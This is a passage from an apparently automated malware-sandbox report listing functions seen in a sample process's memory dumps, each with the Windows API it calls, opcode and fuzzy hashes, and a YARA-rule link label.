                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetFileType.KERNELBASE(?,00000E9C,125E3374,00000000,00000000,00000000,00000000), ref: 02770819
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001E.00000002.2177031252.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: FileType
                                                                                            • String ID:
                                                                                            • API String ID: 3081899298-0
                                                                                            • Opcode ID: 929edde7d1242b832670c60f3672144839a8cb0e5a4d765089e5aab97803d242
                                                                                            • Instruction ID: 999d14060efe9bba6964df38a6f312a6550438f34544490a2f7a44d60f27635e
                                                                                            • Opcode Fuzzy Hash: 929edde7d1242b832670c60f3672144839a8cb0e5a4d765089e5aab97803d242
                                                                                            • Instruction Fuzzy Hash: 0B018C72500704EFFB209F15DC86FA6FB98DF44720F1485AAFD099A282D674A904CAA2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 027713AA, Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001E.00000002.2177031252.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: ConsoleWrite
                                                                                            • String ID:
                                                                                            • API String ID: 2657657451-0
                                                                                            • Opcode ID: 1660c4b0b2972a1222a4ce90e71fc2389f67ca33e92b11c1760ba3d8326cee50
                                                                                            • Instruction ID: 275b1237f0fb95bdaf338d843c4512135de463be82bdc189a6a2850684ef4f95
                                                                                            • Opcode Fuzzy Hash: 1660c4b0b2972a1222a4ce90e71fc2389f67ca33e92b11c1760ba3d8326cee50
                                                                                            • Instruction Fuzzy Hash: 7311AD76510700DFEF20CF56DC85B66FBA4EF04620F08C4AAED4A8B652D771E418CB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01DCAB75, Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetLogicalDrives.KERNELBASE ref: 01DCABC9
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001E.00000002.2170145326.0000000001DCA000.00000040.00000001.sdmp, Offset: 01DCA000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: DrivesLogical
                                                                                            • String ID:
                                                                                            • API String ID: 999431828-0
                                                                                            • Opcode ID: 2c2fcf885ff38a25bbd1a09ab44fc8eadd6a1d54672698a8b4c53ec46685040f
                                                                                            • Instruction ID: 3e7f874544870d80cca4e43fffcb0be007d3f142b358bff848e29596eb742ce6
                                                                                            • Opcode Fuzzy Hash: 2c2fcf885ff38a25bbd1a09ab44fc8eadd6a1d54672698a8b4c53ec46685040f
                                                                                            • Instruction Fuzzy Hash: 2511C2B64093849FDB11CF55DC85B92FFA4EF46220F0984ABDD488F153D274A508CB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01DCBA32, Relevance: 1.5, APIs: 1, Instructions: 49fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 01DCBA7E
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001E.00000002.2170145326.0000000001DCA000.00000040.00000001.sdmp, Offset: 01DCA000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: CreateFile
                                                                                            • String ID:
                                                                                            • API String ID: 823142352-0
                                                                                            • Opcode ID: 0cb5e7ba56e30cd845e7acd6af1f1c02e34b58e4eea508d42fab506ea97b8a3b
                                                                                            • Instruction ID: baf6f5658e08911e0de44162fb820abbc6e3f51f1a912efd0a78e2830c2d5641
                                                                                            • Opcode Fuzzy Hash: 0cb5e7ba56e30cd845e7acd6af1f1c02e34b58e4eea508d42fab506ea97b8a3b
                                                                                            • Instruction Fuzzy Hash: 0A117C72500700DFEB21CF59DC85B62FBE4EF08651F0889AEDD898B612D271E414DB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0277104E, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 0277109E
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001E.00000002.2177031252.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: InformationVolume
                                                                                            • String ID:
                                                                                            • API String ID: 2039140958-0
                                                                                            • Opcode ID: 96948b867f77d3abe7965644bceff8ab90565ffa887df5ca49a51bf3d46b1ebf
                                                                                            • Instruction ID: 21cffb9719fd9a28f2713d1ae6234baffa96431b67c01903173cdd92870e807d
                                                                                            • Opcode Fuzzy Hash: 96948b867f77d3abe7965644bceff8ab90565ffa887df5ca49a51bf3d46b1ebf
                                                                                            • Instruction Fuzzy Hash: 67017172900600ABE310DF16DC86B76FBA8FB88A20F14816AED099B741D635B915CBE5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02770196, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetConsoleTitleW.KERNEL32(?), ref: 027701D0
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001E.00000002.2177031252.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: ConsoleTitle
                                                                                            • String ID:
                                                                                            • API String ID: 3358957663-0
                                                                                            • Opcode ID: 5667bdb7135bc6fd81e5d43f45ba17f58aed15e4e135197fc67acbb972857490
                                                                                            • Instruction ID: 17b8f921fd01268bcac6b2a077e085cf6ef6de5387e2d8a883901888196ef43d
                                                                                            • Opcode Fuzzy Hash: 5667bdb7135bc6fd81e5d43f45ba17f58aed15e4e135197fc67acbb972857490
                                                                                            • Instruction Fuzzy Hash: B5015A726007449FEB10DF6ADC857AAFBA8EB05621F1884AADC09CB642D674E904CA61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01DCA1EE, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetConsoleCtrlHandler.KERNEL32(?,00000E9C,?,?), ref: 01DCA23E
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001E.00000002.2170145326.0000000001DCA000.00000040.00000001.sdmp, Offset: 01DCA000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: ConsoleCtrlHandler
                                                                                            • String ID:
                                                                                            • API String ID: 1513847179-0
                                                                                            • Opcode ID: 3898458f8a6d3467ac24aad1f30b9c58afe030ad6926a179e2e9a141ddeecd0b
                                                                                            • Instruction ID: 3f6df1bdd86a418a2e5b4c84980dc788114a06d26d781aef6e771c0fba32c0c3
                                                                                            • Opcode Fuzzy Hash: 3898458f8a6d3467ac24aad1f30b9c58afe030ad6926a179e2e9a141ddeecd0b
                                                                                            • Instruction Fuzzy Hash: FE018471900600AFE310DF16DC86B76FBA8FB88A20F14816AED089B741D635F915CBE5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 027712FA, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetConsoleTextAttribute.KERNEL32(?,?), ref: 0277132F
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001E.00000002.2177031252.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: AttributeConsoleText
                                                                                            • String ID:
                                                                                            • API String ID: 646522457-0
                                                                                            • Opcode ID: db7e83c419d67fd933e3c725bf716b11f3123bbf3b4bb06b77ae0b28e11d5afe
                                                                                            • Instruction ID: 401ac2d0670b834902e1761aa86c27146f687f94160a247c6c077df43585c58f
                                                                                            • Opcode Fuzzy Hash: db7e83c419d67fd933e3c725bf716b11f3123bbf3b4bb06b77ae0b28e11d5afe
                                                                                            • Instruction Fuzzy Hash: 7101DF72500300DFEF10CF15DC85BA6FBA4EF04620F48C4AADC098B642D675A404CB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01DCBAFA, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetConsoleScreenBufferInfo.KERNEL32 ref: 01DCBB2F
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001E.00000002.2170145326.0000000001DCA000.00000040.00000001.sdmp, Offset: 01DCA000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: BufferConsoleInfoScreen
                                                                                            • String ID:
                                                                                            • API String ID: 3437242342-0
                                                                                            • Opcode ID: 95fd83e37416644afce76a3dcc44d1439f2f612816979a6b36ea7bcc713add66
                                                                                            • Instruction ID: 122fe8c8f661102937830b1941506aa1ea52852533e80a2b8407770663e7951f
                                                                                            • Opcode Fuzzy Hash: 95fd83e37416644afce76a3dcc44d1439f2f612816979a6b36ea7bcc713add66
                                                                                            • Instruction Fuzzy Hash: 1401D471500200DFEB21CF55DC857A5FBA4EF04660F08C8AFDD498B256D675E804CB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02770F76, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetDriveTypeW.KERNELBASE(?), ref: 02770FB0
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001E.00000002.2177031252.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: DriveType
                                                                                            • String ID:
                                                                                            • API String ID: 338552980-0
                                                                                            • Opcode ID: 7a6dfc01bf144770927f0c605299d1003cbe444395be6f819ae8b153bd6529eb
                                                                                            • Instruction ID: 0528ae3262037588ff2995b162cad062c8819c2de36d322ad1195b3fb8d996a8
                                                                                            • Opcode Fuzzy Hash: 7a6dfc01bf144770927f0c605299d1003cbe444395be6f819ae8b153bd6529eb
                                                                                            • Instruction Fuzzy Hash: E0017872900340DFEB20DF15D885BA6FBA4EB06660F0884AADC09CF246D774E508CAA2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 027704B2, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 02770502
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001E.00000002.2177031252.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: FolderPath
                                                                                            • String ID:
                                                                                            • API String ID: 1514166925-0
                                                                                            • Opcode ID: 0fe7efdfac891f33bc33621914e86266a779a0075e9bdd3bce468dedbfd85e2b
                                                                                            • Instruction ID: 75b010c9777296bd7e242a2a621aa1a61a76b74544ae90074cbb0ee09aa7b0d5
                                                                                            • Opcode Fuzzy Hash: 0fe7efdfac891f33bc33621914e86266a779a0075e9bdd3bce468dedbfd85e2b
                                                                                            • Instruction Fuzzy Hash: F7016D72940600ABE310DF16DC86F36FBA8FB88B20F14825AED085B741D675F915CBE6
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01DCA8FA, Relevance: 1.5, APIs: 1, Instructions: 43threadCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetThreadPreferredUILanguages.KERNEL32(?,00000E9C,?,?), ref: 01DCA94A
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001E.00000002.2170145326.0000000001DCA000.00000040.00000001.sdmp, Offset: 01DCA000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: LanguagesPreferredThread
                                                                                            • String ID:
                                                                                            • API String ID: 842807343-0
                                                                                            • Opcode ID: 860790c3befc5e6cd77b2e405fe352d04e50e9179715dc147cc02be5b49b6f35
                                                                                            • Instruction ID: 2882a2903d75e8d324d46cc60899d0d591c10695c275c56a556fca96556cd192
                                                                                            • Opcode Fuzzy Hash: 860790c3befc5e6cd77b2e405fe352d04e50e9179715dc147cc02be5b49b6f35
                                                                                            • Instruction Fuzzy Hash: C1016D72940600ABE310DF16DC86F36FBA8FB88B20F14825AED085B741D675F915CBE6
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0277060E, Relevance: 1.5, APIs: 1, Instructions: 39fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • UnmapViewOfFile.KERNELBASE(?), ref: 02770640
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001E.00000002.2177031252.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: FileUnmapView
                                                                                            • String ID:
                                                                                            • API String ID: 2564024751-0
                                                                                            • Opcode ID: 4831cee3528b0949d76c712c54842f9316e7669227582e5e92ebb1fe339144f9
                                                                                            • Instruction ID: e95a05138bb5aef171a32f9bd669c512cb7430472ad76b3b92234548e2bc03e4
                                                                                            • Opcode Fuzzy Hash: 4831cee3528b0949d76c712c54842f9316e7669227582e5e92ebb1fe339144f9
                                                                                            • Instruction Fuzzy Hash: 2E01F435500700DFEF108F15DC85761FBA0DF45624F08C0AADC098B752D674E804CAA2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01DCAB9A, Relevance: 1.5, APIs: 1, Instructions: 38COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetLogicalDrives.KERNELBASE ref: 01DCABC9
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001E.00000002.2170145326.0000000001DCA000.00000040.00000001.sdmp, Offset: 01DCA000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: DrivesLogical
                                                                                            • String ID:
                                                                                            • API String ID: 999431828-0
                                                                                            • Opcode ID: 378b1771a9ee558376c8e68686d070ac5a2df88637367256ad3e0232f3428ba9
                                                                                            • Instruction ID: 16781dfe6178ef676341a91dcb33e842497cd346c4d24e27fd910f40a84450a0
                                                                                            • Opcode Fuzzy Hash: 378b1771a9ee558376c8e68686d070ac5a2df88637367256ad3e0232f3428ba9
                                                                                            • Instruction Fuzzy Hash: 2F01D135404344DFEB10DF59DC85BA1FBA4EF05620F08C8AADD098F202E674A404CBA2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02771116, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetThreadUILanguage.KERNEL32(?), ref: 02771148
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001E.00000002.2177031252.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: LanguageThread
                                                                                            • String ID:
                                                                                            • API String ID: 243849632-0
                                                                                            • Opcode ID: 96cde557aac3fe189f7804e721458ca40fef78b975e868e73595bc4b1e0b0814
                                                                                            • Instruction ID: 427c98697889dde0bf91c5357c5579080492bcc005fed3440ef461716b608ab2
                                                                                            • Opcode Fuzzy Hash: 96cde557aac3fe189f7804e721458ca40fef78b975e868e73595bc4b1e0b0814
                                                                                            • Instruction Fuzzy Hash: 31F0A935500740DFEB20CF05DC89B66FBA4EF05A25F88C1EADD495F312D679A948CBA2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0277096A, Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetSystemInfo.KERNELBASE(?), ref: 0277099C
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001E.00000002.2177031252.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: InfoSystem
                                                                                            • String ID:
                                                                                            • API String ID: 31276548-0
                                                                                            • Opcode ID: 5058fc5cf8f46426a43a2389440083f4dcf88ba74809a2f4045a6b0cff1891d0
                                                                                            • Instruction ID: d2c324f3de39616226da60755e453eeec517eed4fb11d684a0d212232d6e42b4
                                                                                            • Opcode Fuzzy Hash: 5058fc5cf8f46426a43a2389440083f4dcf88ba74809a2f4045a6b0cff1891d0
                                                                                            • Instruction Fuzzy Hash: 6BF0A935904740DFEB209F16D889B66FBA0EF55621F08C09ADD494B316D275A808CEA2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01DCA36A, Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001E.00000002.2170145326.0000000001DCA000.00000040.00000001.sdmp, Offset: 01DCA000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: Flags
                                                                                            • String ID:
                                                                                            • API String ID: 3401871038-0
                                                                                            • Opcode ID: 19ddbb8aeeffcfb3a15d7e0982c85b4cc0757335a7c2d6348c3e790d8d98a4c9
                                                                                            • Instruction ID: 2bf2a4d6ddbec8b372b198c5ea4f4f4f686d077fac2155f72c585ba753201e16
                                                                                            • Opcode Fuzzy Hash: 19ddbb8aeeffcfb3a15d7e0982c85b4cc0757335a7c2d6348c3e790d8d98a4c9
                                                                                            • Instruction Fuzzy Hash: 23F0AF35504744DFEB209F55DC85765FBA0EF04A25F08C59ADD494B312E3B5E804CAA2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01DCAA42, Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetConsoleOutputCP.KERNEL32 ref: 01DCAA71
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001E.00000002.2170145326.0000000001DCA000.00000040.00000001.sdmp, Offset: 01DCA000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: ConsoleOutput
                                                                                            • String ID:
                                                                                            • API String ID: 3985236979-0
                                                                                            • Opcode ID: 7bd988fadb16ccb250322b0cd0040f8b1f7b64a6af5e05b772eb39e9b08a918f
                                                                                            • Instruction ID: d06e68fb9d89c2f048b7f8dfc4ccb5471c55d45f2c1c3aca1d2d135601c1cbb0
                                                                                            • Opcode Fuzzy Hash: 7bd988fadb16ccb250322b0cd0040f8b1f7b64a6af5e05b772eb39e9b08a918f
                                                                                            • Instruction Fuzzy Hash: 18F0F631500745DFEB10CF19D985762FF90DF05A21F08C49ADD498F352E274E504CBA2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01DCA974, Relevance: 1.3, APIs: 1, Instructions: 54COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CloseHandle.KERNELBASE(?), ref: 01DCA9C8
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001E.00000002.2170145326.0000000001DCA000.00000040.00000001.sdmp, Offset: 01DCA000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: CloseHandle
                                                                                            • String ID:
                                                                                            • API String ID: 2962429428-0
                                                                                            • Opcode ID: dbf55ba9e53ab57dee5bfd54e1859807119a60774dfdc671ab578c09a8dd4ebe
                                                                                            • Instruction ID: 4949da9bd67a8635c0f04283a22fca1efc1678189c7b6cd337af0d4f08332791
                                                                                            • Opcode Fuzzy Hash: dbf55ba9e53ab57dee5bfd54e1859807119a60774dfdc671ab578c09a8dd4ebe
                                                                                            • Instruction Fuzzy Hash: 081191715093849FD712CB25DC89B92FFA4DF46220F0984ABED45CB253D275A808CB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01DCA996, Relevance: 1.3, APIs: 1, Instructions: 43COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CloseHandle.KERNELBASE(?), ref: 01DCA9C8
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001E.00000002.2170145326.0000000001DCA000.00000040.00000001.sdmp, Offset: 01DCA000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: CloseHandle
                                                                                            • String ID:
                                                                                            • API String ID: 2962429428-0
                                                                                            • Opcode ID: 25b26405d8996fded4bd061f80e9715077cdb6a3acf679ad8e9a2d58bf5f4046
                                                                                            • Instruction ID: d6ce560383310db6e962cb87a0abd48c80a788ce3b3254e3886e215aa12a65dd
                                                                                            • Opcode Fuzzy Hash: 25b26405d8996fded4bd061f80e9715077cdb6a3acf679ad8e9a2d58bf5f4046
                                                                                            • Instruction Fuzzy Hash: 5001DF75500644DFEB10DF19DC897A6FB94DF04620F08C4AEDC0A8B242E675E804CB62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02B308B1, Relevance: .1, Instructions: 52COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001E.00000002.2178566942.0000000002B30000.00000040.00000001.sdmp, Offset: 02B30000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: fb305dd0ee4a2db18c86e906632be976b978ca134cbedc64cc8bbbd9cf403a5d
                                                                                            • Instruction ID: 188996af8e2df94120d8ec7e3a2559f3bed67157afe1e6d9a256e5f43d14597d
                                                                                            • Opcode Fuzzy Hash: fb305dd0ee4a2db18c86e906632be976b978ca134cbedc64cc8bbbd9cf403a5d
                                                                                            • Instruction Fuzzy Hash: 9F011D5210E3D10FCB038B3458A9495BF726E9321034F86DBC081CF0A7DAA88809D362
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02B30861, Relevance: .0, Instructions: 27COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001E.00000002.2178566942.0000000002B30000.00000040.00000001.sdmp, Offset: 02B30000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 342fb081164c6fdc64c4057b04b2c539611f2cea06a13d259afeeaa6be599a62
                                                                                            • Instruction ID: 2be51bdd1cbaffe46f675c9fe76f7cc0ce61a35c57b6dcddd6375eee6060bcb8
                                                                                            • Opcode Fuzzy Hash: 342fb081164c6fdc64c4057b04b2c539611f2cea06a13d259afeeaa6be599a62
                                                                                            • Instruction Fuzzy Hash: DAE0922210E3D01FCB03973858A5895BF729E8311070E82EBD581CF1A7DAA84805D362
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01DC23F4, Relevance: .0, Instructions: 15COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001E.00000002.2170127733.0000000001DC2000.00000040.00000001.sdmp, Offset: 01DC2000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d4b6f452daa0d6954444127288b567fbe80e17608993214ca07409a3bd2d708c
                                                                                            • Instruction ID: 9db4ca24eb5b913dc146bf86e2e7bca8721b2f425fc7a1f6704b7f7de1de2fb7
                                                                                            • Opcode Fuzzy Hash: d4b6f452daa0d6954444127288b567fbe80e17608993214ca07409a3bd2d708c
                                                                                            • Instruction Fuzzy Hash: 4DD05E79208A828FE7168A1CC1A5B957BA4AF69B04F4648FDE840CB6A3C768E581D200
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01DC23BC, Relevance: .0, Instructions: 14COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001E.00000002.2170127733.0000000001DC2000.00000040.00000001.sdmp, Offset: 01DC2000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 2cc46d1d53fa278e16a1db8b7b2feac7abb05dd720ded4e65ca0f95f1f0ef2fb
                                                                                            • Instruction ID: 2086681d072e6010e9bbfb8ea777ab122413ceafeb01866ceae5fb651cf87e93
                                                                                            • Opcode Fuzzy Hash: 2cc46d1d53fa278e16a1db8b7b2feac7abb05dd720ded4e65ca0f95f1f0ef2fb
                                                                                            • Instruction Fuzzy Hash: CAD05E343006828FEB15CA1CC194F5977E4AF44B00F0648ECFC008B666C3B5E880C600
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Non-executed Functions

                                                                                            Analysis Process: 69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe PID: 2940 Parent PID: 2900 69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeCOMMON

                                                                                            Executed Functions

                                                                                            Function 001C1CBB, Relevance: 1.7, APIs: 1, Instructions: 224fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • DeleteFileW.KERNEL32(00000000), ref: 001C6E38
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001F.00000002.2351804918.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: DeleteFile
                                                                                            • String ID:
                                                                                            • API String ID: 4033686569-0
                                                                                            • Opcode ID: d97e302999ed702a8a4652c3162a03625ac8f2ed798c91f9152ba8e5e568cb74
                                                                                            • Instruction ID: 1151004eb33e0ac91766288961fa13db825bf4c5cc9daf4817b9e80c7e696191
                                                                                            • Opcode Fuzzy Hash: d97e302999ed702a8a4652c3162a03625ac8f2ed798c91f9152ba8e5e568cb74
                                                                                            • Instruction Fuzzy Hash: 6F81A37180D3D85FCB02CB68CC656DABFB4EF46214F09419BC485EB693D7389A09CBA1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 001C6D78, Relevance: 1.6, APIs: 1, Instructions: 85fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • DeleteFileW.KERNEL32(00000000), ref: 001C6E38
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001F.00000002.2351804918.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: DeleteFile
                                                                                            • String ID:
                                                                                            • API String ID: 4033686569-0
                                                                                            • Opcode ID: e386f12d264c33afb2ed19b94cad6c8d90b52b965479fdc8cd7354904ffe6e8f
                                                                                            • Instruction ID: 74587b23f2dc479c842476ffbf7d7a7217f3d8fb7d9c3a2689a23b2e44244f4c
                                                                                            • Opcode Fuzzy Hash: e386f12d264c33afb2ed19b94cad6c8d90b52b965479fdc8cd7354904ffe6e8f
                                                                                            • Instruction Fuzzy Hash: 68319871E006198FCB00CFA9D405BEEBBF5EF89314F24856AD858A7241D738E945CBA1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 001C1DD8, Relevance: 1.6, APIs: 1, Instructions: 59fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • DeleteFileW.KERNEL32(00000000), ref: 001C6E38
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001F.00000002.2351804918.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: DeleteFile
                                                                                            • String ID:
                                                                                            • API String ID: 4033686569-0
                                                                                            • Opcode ID: 8fc588f71cd1c256e906fd6f88c037876cd3bdcd5e8498f801f5cb1dfbed6135
                                                                                            • Instruction ID: aa29eeaab920f418a9f232d354f3cbd825849daae8b7625fe8b507fc39ec80e0
                                                                                            • Opcode Fuzzy Hash: 8fc588f71cd1c256e906fd6f88c037876cd3bdcd5e8498f801f5cb1dfbed6135
                                                                                            • Instruction Fuzzy Hash: 082158B1D006199BCB14CF9AC444BEEFBF4EF48314F14852AD818B7240D338A940CFA1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0013D48C, Relevance: .1, Instructions: 75COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001F.00000002.2351545959.000000000013D000.00000040.00000001.sdmp, Offset: 0013D000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 5c2dc4b895f5a4256dc72a513c0e20b39a1f8423dc403f6b6c55507b5a5f2cbe
                                                                                            • Instruction ID: 982b169a2eb59e5d1e6c29155be691c600c26587858317367f32845e627ec21c
                                                                                            • Opcode Fuzzy Hash: 5c2dc4b895f5a4256dc72a513c0e20b39a1f8423dc403f6b6c55507b5a5f2cbe
                                                                                            • Instruction Fuzzy Hash: C8212575644204DFDB05DF10F8C0B66BFB6FB94328F24C569E8054B606C336D806CBA2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0014D01C, Relevance: .1, Instructions: 72COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001F.00000002.2351619377.000000000014D000.00000040.00000001.sdmp, Offset: 0014D000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 67463665cdc0d6d48b60e176b7ddf2d231253c3dddc4e59bf442171ad70cc749
                                                                                            • Instruction ID: b01231a1a1b98927b73217e97519d4a2c8387d5845962ac5bd5aa9f2a659f5dc
                                                                                            • Opcode Fuzzy Hash: 67463665cdc0d6d48b60e176b7ddf2d231253c3dddc4e59bf442171ad70cc749
